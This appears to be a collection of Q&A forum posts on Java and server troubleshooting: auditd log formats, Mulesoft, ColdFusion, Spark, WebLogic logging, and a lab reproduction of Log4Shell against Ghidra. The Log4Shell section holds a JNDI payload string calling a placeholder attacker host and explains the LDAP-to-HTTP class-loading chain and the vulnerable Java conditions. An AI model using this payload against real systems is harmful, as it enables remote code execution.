Auditd dispatcher event parsing fails in RHEL 8 / CentOS 8

I have written a parser to parse audit events received through the dispatcher plugin. On CentOS 8 / RHEL 8 my parser fails to parse the audit events because they arrive in a different format, with some extra parameters appended at the end of each event.

Found the issue: it was the auditd.conf configuration. On CentOS 8 / RHEL 8 a new setting was introduced, log_format = ENRICHED. Changing ENRICHED to RAW gives the events in the old format; alternatively, update the parser to handle ENRICHED.
The auditd.conf man page says:
The ENRICHED option will resolve all uid, gid, syscall, architecture, and socket address information before writing the event to disk. This aids in making sense of events created on one system but reported/analyzed on another system.
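If the parser has to keep accepting ENRICHED events, one option is to split off the appended fields. Below is a minimal sketch, assuming the enrichment is appended after the ASCII group-separator character (0x1D), as newer audit versions do; verify this against your own event stream, and note the sample record is made up:

// AuditRecordSplitter.java - separates the RAW part of an audit record from the
// ENRICHED suffix. Assumption: the resolved fields (UID, GID, SYSCALL, ARCH, ...)
// are appended after an ASCII group separator (0x1D).
public class AuditRecordSplitter {
    private static final char GROUP_SEPARATOR = 0x1D;

    // Returns the RAW portion of the record (everything before the separator).
    public static String rawPart(String record) {
        int idx = record.indexOf(GROUP_SEPARATOR);
        return idx >= 0 ? record.substring(0, idx) : record;
    }

    // Returns the enrichment suffix, or an empty string if the record is RAW.
    public static String enrichedPart(String record) {
        int idx = record.indexOf(GROUP_SEPARATOR);
        return idx >= 0 ? record.substring(idx + 1) : "";
    }

    public static void main(String[] args) {
        String sample = "type=SYSCALL msg=audit(1639140000.123:42): arch=c000003e syscall=257 uid=0"
                + GROUP_SEPARATOR + "ARCH=x86_64 SYSCALL=openat UID=\"root\"";
        System.out.println("raw:      " + rawPart(sample));
        System.out.println("enriched: " + enrichedPart(sample));
    }
}

With this split the existing RAW parser can stay unchanged, and the enriched fields can be parsed separately if they turn out to be useful.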


log4shell POC : no HTTP redirect

I am trying to understand/reproduce the Log4Shell vulnerability, using this PoC and also information from Marshalsec.
To do that, I downloaded Ghidra v10.0.4, which is said (on the Ghidra download page) to be vulnerable to Log4Shell, installed it on an Ubuntu VM along with Java 1.8 (as stated in the PoC), and loaded the PoC plus the Marshalsec snapshot.
When I tried to start Ghidra, it said Java 11 was needed, so although I had installed Java 1.8 I also downloaded Java 11. On startup Ghidra says the installed version is not good enough and asks for the path to a Java 11 installation, so I gave it the path to the JDK 11 directory and it seems happy with that. Ghidra starts fine.
I then set up my listener and launched the PoC, got the payload string to copy/paste into Ghidra, and got a response in the LDAP listener saying it would send it to HTTP. But nothing more. The end.
Since the HTTP server is set up by the same PoC, I thought maybe I just couldn't see the redirection, so I started the HTTP server myself, started the LDAP server myself with Marshalsec, and retried (see the screenshots below for the exact commands/outputs).
Setting up the HTTP server:
Setting up the listener:
Setting up the LDAP server:
Sending the payload string in Ghidra (in the help/search part, as shown in the kozmer PoC); I immediately got an answer:
I still receive a response on the LDAP listener (two, in fact, which seems weird), but nothing on the HTTP server. The Exploit class is never loaded in Ghidra (it immediately shows a pop-up saying the search was not found; I think it is supposed to wait for the server's answer before doing that?), and I get nothing back in my listener.
Note that I don't really understand this Marshalsec/LDAP part, so I'm not sure what's happening here. If anyone has time to explain, that would be nice. I've read a lot about the vulnerability, but it rarely goes deeply into the details (most write-ups say: the payload string sends a request to the LDAP server, which redirects to the HTTP server, which serves the Exploit class to the vulnerable app and gives you a shell).
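To make that chain a bit more concrete, here is a hedged sketch of the vulnerable pattern on the application side; the class, the logger call, and the attacker host are placeholders, and it assumes a log4j-core 2.x version older than 2.15.0 on the classpath:

// VulnerableApp.java - illustrative only; assumes log4j-core 2.x < 2.15.0.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class VulnerableApp {
    private static final Logger LOG = LogManager.getLogger(VulnerableApp.class);

    public static void main(String[] args) {
        // Attacker-controlled input containing a JNDI lookup (host/port are placeholders).
        String userInput = "${jndi:ldap://attacker.example:1389/a}";
        // Vulnerable log4j expands the lookup while formatting the message: it queries the
        // LDAP server, the malicious LDAP server replies with a reference pointing at
        // http://attacker.example:8000/Exploit.class, and on a permissive JVM that class
        // is fetched over HTTP and instantiated, running the attacker's code.
        LOG.error("User input was: {}", userInput);
    }
}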
Note: I've checked that the HTTP server is up and accessible, and that the Exploit.class file is there and can be downloaded.
Solved it.
It turned out that for Log4Shell to work you need both a vulnerable app and a vulnerable version of Java, which I thought I had, but no. I had Java 11.0.15 and needed the original Java 11 release (Ghidra needs Java 11 as a minimum, and the only vulnerable Java 11 release is the first one; later updates default com.sun.jndi.ldap.object.trustURLCodebase to false, so the LDAP referral never leads to the HTTP class download).
Downloaded and installed the original Java 11, and the PoC worked perfectly.
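One way to check which side of that line a given JVM is on is to print the JNDI/LDAP codebase property. The helper class below is hypothetical, but the property name is the standard JDK one; it defaults to false on patched JDKs (8u191+/11.0.1+), which is why the HTTP download never happens there unless it is explicitly enabled:

// TrustUrlCodebaseCheck.java - hypothetical helper; prints the JDK switch that gates
// remote class loading through JNDI/LDAP references.
public class TrustUrlCodebaseCheck {
    public static void main(String[] args) {
        // If the property is unset, patched JDKs behave as if it were "false".
        String value = System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase",
                "unset (treated as false on patched JDKs)");
        System.out.println("com.sun.jndi.ldap.object.trustURLCodebase = " + value);
    }
}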

SO_KEEPALIVE issue in Mulesoft

We have a Mulesoft app that basically picks messages from a queue (ActiveMQ) and then posts them to a target app via an HTTP request to the target's API.
Runtime: 4.3.0
HTTP Connector version: v1.3.2
Server: Windows, On-premise standalone
However, sometimes a message does not get sent successfully after being picked from the queue, and the message below can be found in the log:
WARN 2021-07-10 01:24:46,080 [[masked-app].http.requester.requestConfig.02 SelectorRunner] [event: ] org.glassfish.grizzly.nio.transport.TCPNIOTransport: GRIZZLY0005: Can not set SO_KEEPALIVE to false
java.net.SocketException: Invalid argument: no further information
at sun.nio.ch.Net.setIntOption0(Native Method) ~[?:1.8.0_281]
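For reference, the warning corresponds to the transport trying to clear the socket option at the JDK level. The standalone sketch below is illustrative only (it is not Grizzly's actual code) and shows the kind of call and exception involved:

// KeepAliveProbe.java - illustrative sketch of the JDK-level call behind GRIZZLY0005.
import java.io.IOException;
import java.net.SocketException;
import java.net.StandardSocketOptions;
import java.nio.channels.SocketChannel;

public class KeepAliveProbe {
    public static void main(String[] args) throws IOException {
        try (SocketChannel channel = SocketChannel.open()) {
            try {
                // Grizzly disables keep-alive on its NIO channels; on some Windows/JDK
                // combinations the underlying setsockopt call can fail with "Invalid argument".
                channel.setOption(StandardSocketOptions.SO_KEEPALIVE, false);
                System.out.println("SO_KEEPALIVE = " + channel.getOption(StandardSocketOptions.SO_KEEPALIVE));
            } catch (SocketException e) {
                // Grizzly catches this and only logs a warning; the request itself is not
                // aborted by it, which is consistent with the flow completing silently.
                System.err.println("Could not change SO_KEEPALIVE: " + e.getMessage());
            }
        }
    }
}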
The flow completes silently without any error after the above message, hence no error handling happens.
I found this mentioning it is a known bug on Windows Server and won't affect the behaviour of the application, but that document is about failing to set SO_KEEPALIVE to true rather than false.
It looks like the message did not get posted successfully, as the target system team can't find a corresponding incoming request in their logs.
This is not acceptable, as the message is critical and nobody knows about the failure unless the target system notices something is wrong. I'm not sure whether the failure to set SO_KEEPALIVE to false is the root cause; could you please share some thoughts? Thanks a lot in advance.
This is probably unrelated to the warning you mentioned, but there doesn't seem to be enough information to identify the actual root cause.
Having said that, the version of the HTTP connector is old and is missing almost 3 years of fixes. Updating it to the latest version should improve the reliability of the application.

ColdFusion 2018 - Requests Multiply Executed

With a new project we encountered some strange behaviour in our ColdFusion application. Whenever a single request is initiated from the browser, the code of the CFML templates is executed multiple times. Looking at the corresponding log files we found that the same request does indeed fire the evaluation in our application multiple times; one request generates several entries. This is especially the case for long-running requests, such as database imports.
The ColdFusion application implements a REST service, but even when manually requesting a resource, such as a particular CFML page, on the same application, the code gets executed an unknown number of times (variable initializations, database write operations, etc. take place), and if the request runs too long (capped at around ~4-6 seconds) there is no response to the browser.
About the infrastructure:
The application is ColdFusion 2018 (Standard Edition) with the bundled Tomcat.
The webserver is Apache (2.4.6).
Everything runs on a Linux machine with CentOS 7.7.
The corresponding Java version is 11.0.4.
Our best guess is that there might be some miscommunication between the ColdFusion connector and the Apache webserver. We searched for configuration parameters that could cause the problem, without success. With an installation on a Windows machine we did not encounter this error.
Does anyone have any idea?
We just found our answer in the following post:
Link to Solution

How to submit code to a remote Spark cluster from IntelliJ IDEA

I have two clusters, one in a local virtual machine and another in a remote cloud. Both clusters are in standalone mode.
My Environment:
Scala: 2.10.4
Spark: 1.5.1
JDK: 1.8.40
OS: CentOS Linux release 7.1.1503 (Core)
The local cluster:
Spark Master: spark://local1:7077
The remote cluster:
Spark Master: spark://remote1:7077
I want to finish this:
Write code (just a simple word count) in IntelliJ IDEA locally (on my laptop), set the Spark master URL to spark://local1:7077 or spark://remote1:7077, and then run the code from IntelliJ IDEA. That is, I don't want to use spark-submit to submit a job.
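For reference, the kind of program meant here looks roughly like the sketch below, written against the Spark 1.x Java API; the master URL, driver host, and input path are placeholders:

// RemoteWordCount.java - rough sketch against the Spark 1.x Java API; values are placeholders.
// (For Spark 2.x the flatMap lambda would need to return an Iterator instead of a List.)
import java.util.Arrays;
import org.apache.spark.SparkConf;
import org.apache.spark.api.java.JavaPairRDD;
import org.apache.spark.api.java.JavaRDD;
import org.apache.spark.api.java.JavaSparkContext;
import scala.Tuple2;

public class RemoteWordCount {
    public static void main(String[] args) {
        SparkConf conf = new SparkConf()
                .setAppName("RemoteWordCount")
                .setMaster("spark://remote1:7077")
                // The workers must be able to reach the driver running inside IntelliJ,
                // so this should be an address of the laptop that the cluster can route to.
                .set("spark.driver.host", "laptop.example.com");

        JavaSparkContext sc = new JavaSparkContext(conf);
        JavaRDD<String> lines = sc.textFile("hdfs:///tmp/input.txt");
        JavaPairRDD<String, Integer> counts = lines
                .flatMap(line -> Arrays.asList(line.split(" ")))
                .mapToPair(word -> new Tuple2<>(word, 1))
                .reduceByKey((a, b) -> a + b);
        counts.collect().forEach(t -> System.out.println(t._1() + ": " + t._2()));
        sc.stop();
    }
}

When this runs against a remote cluster, the compiled application classes also have to reach the executors (for example via SparkConf.setJars pointing at the built jar), otherwise tasks fail with ClassNotFoundException.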
But I ran into a problem:
When I use the local cluster, everything goes well. Both running the code from IntelliJ IDEA and using spark-submit submit the job to the cluster and finish it.
But when I use the remote cluster, I get this warning in the log:
TaskSchedulerImpl: Initial job has not accepted any resources; check your cluster UI to ensure that workers are registered and have sufficient resources
Note that the message says sufficient resources, not sufficient memory!
This log line keeps printing and nothing further happens. Both spark-submit and running the code from IntelliJ IDEA give the same result.
I want to know:
Is it possible to submit code from IntelliJ IDEA to the remote cluster?
If so, what configuration is needed?
What are the possible causes of my problem?
How can I fix it?
Thanks a lot!
Update
There is a similar question here, but I think my situation is different. When I run my code in IntelliJ IDEA and set the Spark master to the local virtual machine cluster, it works. Against the remote cluster, I get the "Initial job has not accepted any resources..." warning instead.
I want to know whether a security policy or firewall could cause this?
Submitting code programmatically (e.g. via SparkSubmit) is quite tricky. At the least, there is a variety of environment settings and considerations (handled by the spark-submit script) that are quite difficult to replicate within a Scala program. I am still uncertain how to achieve it, and there have been a number of long-running threads in the Spark developer community on the topic.
My answer here is about a portion of your post, specifically this warning:
TaskSchedulerImpl: Initial job has not accepted any resources; check your cluster UI to ensure that workers are registered and have sufficient resources
The reason is typically a mismatch between the memory and/or number of cores requested by your job and what is available on the cluster. Possibly, when submitting from IntelliJ, the settings in
$SPARK_HOME/conf/spark-defaults.conf
were not properly matched to the parameters required for your task on the existing cluster. You may need to update:
spark.driver.memory 4g
spark.executor.memory 8g
spark.executor.cores 8
You can check the Spark UI on port 8080 to verify that the parameters you requested are actually available on the cluster.
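When submitting from the IDE rather than via spark-submit, the same limits can also be set programmatically on the SparkConf. A small sketch (the values are examples only and must fit within what the remote workers actually offer):

// ResourceCheck.java - sketch: request resources explicitly and keep them within what
// the standalone workers advertise on the master UI (port 8080). Requesting more memory
// or cores than any worker offers leaves the job stuck in the
// "has not accepted any resources" state.
import java.util.Arrays;
import org.apache.spark.SparkConf;
import org.apache.spark.api.java.JavaSparkContext;

public class ResourceCheck {
    public static void main(String[] args) {
        SparkConf conf = new SparkConf()
                .setAppName("ResourceCheck")
                .setMaster("spark://remote1:7077")
                .set("spark.executor.memory", "2g")   // per-executor memory
                .set("spark.cores.max", "2");         // total cores for this app (standalone mode)

        JavaSparkContext sc = new JavaSparkContext(conf);
        // A trivial action: if resources were granted, this returns quickly instead of
        // looping on the "has not accepted any resources" warning.
        System.out.println(sc.parallelize(Arrays.asList(1, 2, 3)).count());
        sc.stop();
    }
}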

How to use java.util.logging in Weblogic?

I have an application that was migrated from GlassFish to WebLogic, and it uses java.util.logging as its logging framework.
The only way I have found to make the logs work is to edit the JVM's logging.properties file and restart the server. This solution is awkward and causes problems because the log is written to a different file than the standard WebLogic ones, so we have to look through too many files for a log in a clustered environment. Besides, for some reason this does not work on some Windows systems.
Is there a way to keep using standard Java logging and have the messages written to WebLogic's standard log files? I tried the instructions on this page, but that doesn't work either.
WebLogic Server ships with a JDK logging handler that picks up log messages emitted through the JDK logging framework and directs them into the WebLogic Server logging system.
Set the default logging level for new ServerLoggingHandler instances in logging.properties, and add the ServerLoggingHandler to the handlers:
handlers = weblogic.logging.ServerLoggingHandler
weblogic.logging.ServerLoggingHandler.level = ALL
http://docs.oracle.com/cd/E14571_01/web.1111/e13739/logging_services.htm#CHDBBEIJ
To direct the JDK logging framework to use this logging.properties file, use the standard system property java.util.logging.config.file. With WebLogic Server, this can easily be done by adding it to the JAVA_OPTIONS environment variable picked up by the start scripts:
$ export JAVA_OPTIONS="-Djava.util.logging.config.file=/Users/xxx/Projects/Domains/wls1035/logging.properties"
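Application code then keeps using plain java.util.logging; nothing WebLogic-specific is needed in the code itself. The class and messages below are just placeholders:

// OrderService.java - placeholder class; with the ServerLoggingHandler configured above,
// these JDK logging records end up in the standard WebLogic server log.
import java.util.logging.Level;
import java.util.logging.Logger;

public class OrderService {
    private static final Logger LOGGER = Logger.getLogger(OrderService.class.getName());

    public void placeOrder(String orderId) {
        LOGGER.info(() -> "Placing order " + orderId);        // routine message
        if (orderId == null || orderId.isEmpty()) {
            LOGGER.log(Level.WARNING, "Rejecting order with empty id");
            return;
        }
        // ... business logic ...
        LOGGER.fine(() -> "Order " + orderId + " stored");    // only visible if the level allows FINE
    }
}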
Some more hints here: http://buttso.blogspot.de/2011/06/using-slf4j-with-weblogic-server.html